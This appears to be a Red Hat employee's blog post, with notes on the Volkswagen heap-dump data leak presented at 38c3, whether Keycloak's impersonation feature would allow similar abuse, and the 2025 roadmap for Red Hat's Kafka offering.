Things to add to CW1 2025 - Volkswagen data leak @38c3 2024 - Quarkus, Connectivity Link, ACS
Again, here is the recording from the 28c3 (in German)
A Red Hat colleague pointed out to me that in addition to the heap dump, there was another reason for the data leak at Volkswagen, namely the identity provider.
We don’t know exactly which one was used, so we took the use case and looked at whether it would also be possible with our product Keycloak.
As a reminder: The reason for the data leak was that the developers of their Spring software left the actuator and in particular the path /actuator/heapdump activated in the production software. This allowed the people from the CCC to make heap dumps and carry out data analysis.
In the heap dump they found client_id and client_secret for OAuth2 authentication, carried out a token exchange and were able to impersonate the user.
So our question was: Is it possible to log into a system as a user if you have a client ID and client secret?
Roughly speaking, this means that you use the information to have a valid token issued so that you can do everything in the system that the user is allowed to do.
Keycloak (and also the OAuth standard) has the Impersonate function, which you can use to issue user tokens. Link to documentation
However, this requires that a client explicitly has the corresponding authorization, so you have to assign this permission manually to them. The documentation warns against exactly this kind of approach and points out the corresponding dangers.
My colleague points out that there are legacy applications that would require this impersonate feature. This is not a topic I want to delve deeper into. If so, then you should adapt legacy applications instead of opening up such a big leak. No matter how long it takes.
Red Hat Kafka
Most recently, I have been fortunate enough to be able to work on an opportunity that involves operating and using a Kafka, which leads me to look into the roadmap and new developments around Red Hat Kafka (upstream Strimzi).
The great thing about Red Hat’s Kafka offer is that you can not only buy Kafka but also subscribe to a bundle. This means that for the same money (= core subscription on the OpenShift cluster) you get a Kafka but also many other products that you use anyway if you want to get real added value.
Worth mentioning here are Debezium (Change data capture), a framework that reacts to database changes, but also the integration framework Camel or the schema registry Apicurio.
The roadmap highlights for 2025 are:
- Zookeeper removal and migration to KRaft (= more lightweight deployment)
- Record encryption (via Kroxylicious, encryption at rest)
- new AMQ streams console
- Apache Flink (stream batch processing, more efficient than Kafka Streams API)
Some of the roadmap highlights are already generally available, but I don’t have time (yet) to dive deeper. It will be exciting.